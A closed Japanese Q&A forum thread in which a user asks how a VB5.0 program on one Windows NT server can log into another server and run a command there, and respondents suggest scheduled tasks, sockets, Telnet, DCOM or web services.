• 締切済み

サーバへのログインなど

VBで作成したexeを、あるサーバ(サーバA)で実行し、別なサーバ(サーバB)にログイン後、コマンドを実行して終了する。といった物を作成したいのですが、参考となる記事ありませんか? やりたい事の流れは、 サーバAでexeを実行-->サーバBにログインし、コマンドを実行-->終了。 環境 VB5.0 サーバは、WinNTサーバ

みんなの回答

• todo36
回答No.3

サーバー側にタスクを登録しておいて、クライアントアプリで そのタスクをキックするという手が思い付いた。 VBでどうやるのかは知らないが telenetに関しては過去ログ参照。

• 2ch
回答No.2

サーバ側にも待機するアプリを仕込んでよいなら、ソケット通信でやりとりするという手もあり。

参考URL:
http://oshiete1.goo.ne.jp/kotaeru.php3?q=155606
nosiyuho
質問者

補足

サーバでの待機アプリは仕込みたくないのですが。

• todo36
回答No.1

どんな方法があるか知りたいと言うこと? Webアプリ Webサービス Windowsサービス DCOM ターミナルサービス Telenet が思い付きます。 私だったらVS.NETでWebサービスかな。

nosiyuho
質問者

補足

サーバにログインするコーディング(VB5.0)が知りたいのですが。 知りたい事は、Telnetが近いかと思います。ただし、ユーザID等は、特定のIDで行いたいです。 ※質問時に書いていた事が、間違っていましたので、書き直します。 利用方法としては、Webを利用せず、ユーザがexeを実行すると、NTサーバにログインし、サーバ上のあるコマンドを実行する。(結果は返る必要なし)